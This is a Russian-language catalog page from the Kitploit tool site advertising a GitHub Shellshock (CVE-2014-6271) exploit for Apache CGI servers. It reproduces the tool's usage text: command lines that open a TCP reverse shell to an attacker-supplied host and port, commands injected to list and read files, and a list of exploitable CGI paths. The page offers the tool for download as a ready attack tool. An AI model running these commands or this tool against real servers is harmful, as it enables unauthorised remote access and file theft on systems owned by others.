Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
-CVE-2014-6271-Shellshock-Remote-Command-Injection- — [CVE-2014-6271] Инструмент Apache Shellshock для удаленного внедрения команд для быстрой обратной оболочки и просмотра файлов | Kitploit
Инструменты/GitHubGitHub/filipstudeny/-cve-2014-6271-shellshock-remote-command-injection-
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubfilipstudeny/-cve-2014-6271-shellshock-remote-command-injection-

-CVE-2014-6271-Shellshock-Remote-Command-Injection-

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

[CVE-2014-6271] Инструмент Apache Shellshock для удаленного внедрения команд для быстрой обратной оболочки и просмотра файлов

Репозиторий
3 лет назадЕщё не проверено

[CVE-2014-6271] Shellshock-Remote-Command-Injection

[CVE-2014-6271] Инструмент Apache Shellshock Remote Command Injection для быстрого получения обратной оболочки и просмотра файлов

root@kitploit:~
Shellshock Apache remote exploit

Usage:
    ./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"

Variables:
    Victim:
        rhost => Victim IP
        rport => Victim PORT 
        
    Attacker (For reverse shell):
        lhost => Attacker IP
        lport => Attacker PORT for reverse shell 
    
    Echo:
        echo => Custom command to inject
        
        Examples:
            echo="ls -la"
            echo="cat file.txt"
        
    Config:
        pages => Specific cgi vulnerable pages 
            Exploitable pages:
                [0] /cgi-sys/entropysearch.cgi",
                [1] /cgi-sys/defaultwebpage.cgi",
                [2] /cgi-mod/index.cgi",
                [3] /cgi-bin/test.cgi",
                [4] /cgi-bin-sdb/printenv            
    Payloads:
        "reverse" => (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
        "files" => Read and browse through files (Requires: rhost, echo)    
        
    Created by Filip Studený
Скачать инструмент